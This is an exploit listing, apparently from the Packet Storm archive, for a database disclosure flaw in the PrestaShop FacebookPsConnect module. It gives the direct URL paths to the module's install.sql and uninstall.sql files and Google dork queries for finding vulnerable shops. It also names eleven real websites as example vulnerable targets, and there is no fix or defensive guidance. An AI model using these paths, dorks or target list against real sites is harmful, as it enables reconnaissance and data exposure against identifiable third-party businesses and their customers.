PrestaShop FacebookPsConnect 1.6.1.4 Database Disclosure

2018-12-24T00:00:00
ID PACKETSTORM:150903
Type packetstorm
Reporter KingSkrupellos
Modified 2018-12-24T00:00:00

Description

                                        
                                            `#################################################################################################  
  
# Exploit Title : PrestaShop FacebookPsConnect Modules 1.6.1.4 Database  
Disclosure  
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security  
Army  
# Date : 24/12/2018  
# Vendor Homepage : prestashop.com ~ businesstech.fr  
# Software Download Link : modulebazaar.com/prestashop-facebook-connect.html  
+ sourceforge.net/projects/prestashopfacebookconnect/  
# Software Installation Price : 50$  
# Tested On : Windows and Linux  
# Category : WebApps  
# Version Information : 1.4.11.0A+- ~ 1.5.4.0 ~ 1.5.5.0 ~ 1.5.6.1 ~ 1.5.6.2  
~ 1.6.1.4 ~ 1.6.0.9  
# Exploit Risk : Medium  
# Google Dorks : inurl:''/modules/facebookpsconnect/sql/''  
intext:''FiA"rement rA(c)alisA(c) par Mezcalito''  
intext:''Copyright 2018 / PrestaShop. Implented by DGWStudios.com & Design  
by LeoTheme''  
intext:''Copyrights 2012 rygeshop.dk Alle rettigheder forbeholdes''  
intext:''A(c) 2018 Powered by Billiandi Creations LtdaC/''  
intext:''A(c) 2013 - Vinta Quatre. Tous droits rA(c)servA(c)s - CrA(c)ation Yellow  
Agence Internet''  
intext:''A(c) 2013 oscadi.comaC/''  
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access  
Controls ]  
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]  
  
#################################################################################################  
  
* PrestaShop FacebookPsConnect Modules Install Uninstall Script Database  
Disclosure  
  
#################################################################################################  
  
# Exploit :  
  
/modules/facebookpsconnect/sql/install.sql  
  
/modules/facebookpsconnect/sql/uninstall.sql  
  
#################################################################################################  
  
# Example Vulnerable Sites =>  
  
[+] fcgshop.com/modules/facebookpsconnect/sql/install.sql  
  
[+] vinta-quatre.com/modules/facebookpsconnect/sql/install.sql  
  
[+] poemana.com/catalogue/modules/facebookpsconnect/sql/install.sql  
  
[+] lecoindespetits.com/modules/facebookpsconnect/sql/install.sql  
  
[+] dimayori.com.gt/modules/facebookpsconnect/sql/install.sql  
  
[+] shakarababe.com/modules/facebookpsconnect/sql/  
  
[+] neurodigital.es/store/modules/facebookpsconnect/sql/install.sql  
  
[+] rygeshop.dk/modules/facebookpsconnect/sql/install.sql  
  
[+]  
ultimateparisguide.com/registration/modules/facebookpsconnect/sql/install.sql  
  
[+] dietanat.com/modules/facebookpsconnect/sql/install.sql  
  
[+] margauxlonnberg.com/shop/modules/facebookpsconnect/sql/install.sql  
  
#################################################################################################  
  
# Discovered By Hacker KingSkrupellos from Cyberizm.Org Digital Security  
Team  
  
#################################################################################################  
`